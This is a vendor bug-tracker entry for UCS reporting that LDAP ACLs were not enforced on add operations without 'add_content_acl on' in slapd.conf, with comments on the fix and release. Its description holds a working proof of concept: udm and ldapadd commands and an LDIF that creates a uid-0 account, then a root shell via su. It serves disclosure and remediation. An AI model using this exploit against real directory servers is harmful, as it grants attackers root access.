First Last Prev Next    This bug is not in your last search results.
Bug 41797 - add add_content_acl on to slapd.conf
add add_content_acl on to slapd.conf
Status: CLOSED FIXED
Product: UCS
Classification: Unclassified
Component: LDAP
UCS 4.1
Other Linux
: P5 critical (vote)
: UCS 4.2
Assigned To: Florian Best
Arvid Requate
: interim-1
Depends on: 49523 49524 41715 41725 44055 49434 49507
Blocks: 41723 41724
  Show dependency treegraph
 
Reported: 2016-07-15 09:51 CEST by Florian Best
Modified: 2021-06-23 07:29 CEST (History)
3 users (show)

See Also:
What kind of report is it?: Security Issue
What type of bug is this?: ---
Who will be affected by this bug?: ---
How will those affected feel about the bug?: ---
User Pain:
Enterprise Customer affected?:
School Customer affected?:
ISV affected?:
Waiting Support:
Flags outvoted (downgraded) after PO Review:
Ticket number:
Bug group (optional): Security
Max CVSS v3 score:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Florian Best univentionstaff 2016-07-15 09:51:55 CEST 
The content of LDAP-ACL's are only evaluated if the database entry in slapd.conf contains "add_content_acl on". Memberservers/DC's can create arbitrary objects in various positions otherwise.
As there are dependencies between UCS and UCS@school we release this part of Bug #41715 a little bit later.

+++ This bug was initially created as a clone of Bug #41715 +++

Preconditions: Having a memberserver/slave/master/backup or any object underneath of cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base.

root@xen3:~# eval "$(ucr shell)"
root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base"
Object created: cn=memberserver,cn=computers,dc=school,dc=local
root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention
Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local

# now PWN it
$ cat posix_account.ldif
dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
cn: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
loginShell: /bin/bash
userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8=
$ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif
adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local"
$ su hacker
Passwort: 
hacker@xen3:~# id
uid=0(hacker) gid=0(root) Gruppen=0(root)
Comment 1 Florian Best univentionstaff 2017-01-13 19:00:43 CET 
r75785 | Changelog Bug #41797

univention-ldap (13.0.2-1):
r75784 | Bug #41797: add add_content_acl on configuration
Comment 2 Arvid Requate univentionstaff 2017-02-01 21:12:55 CET 
Ok, I made the wording of the changelog entry a bit more verbose.

Relevant documentation from slapd.conf():
===============================================================================
add_content_acl:

Controls  whether  Add  operations  will  perform ACL checks on the content of the entry being added. [...]
===============================================================================

And slapd.access(5) says:
===============================================================================
Also if Add content ACL checking has been configured on the database [...], add (=a) will be required on all of the attributes being added.
===============================================================================
Comment 3 Stefan Gohmann univentionstaff 2017-04-04 18:29:21 CEST 
UCS 4.2 has been released:
 https://docs.software-univention.de/release-notes-4.2-0-en.html
 https://docs.software-univention.de/release-notes-4.2-0-de.html

If this error occurs again, please use "Clone This Bug".
First Last Prev Next    This bug is not in your last search results.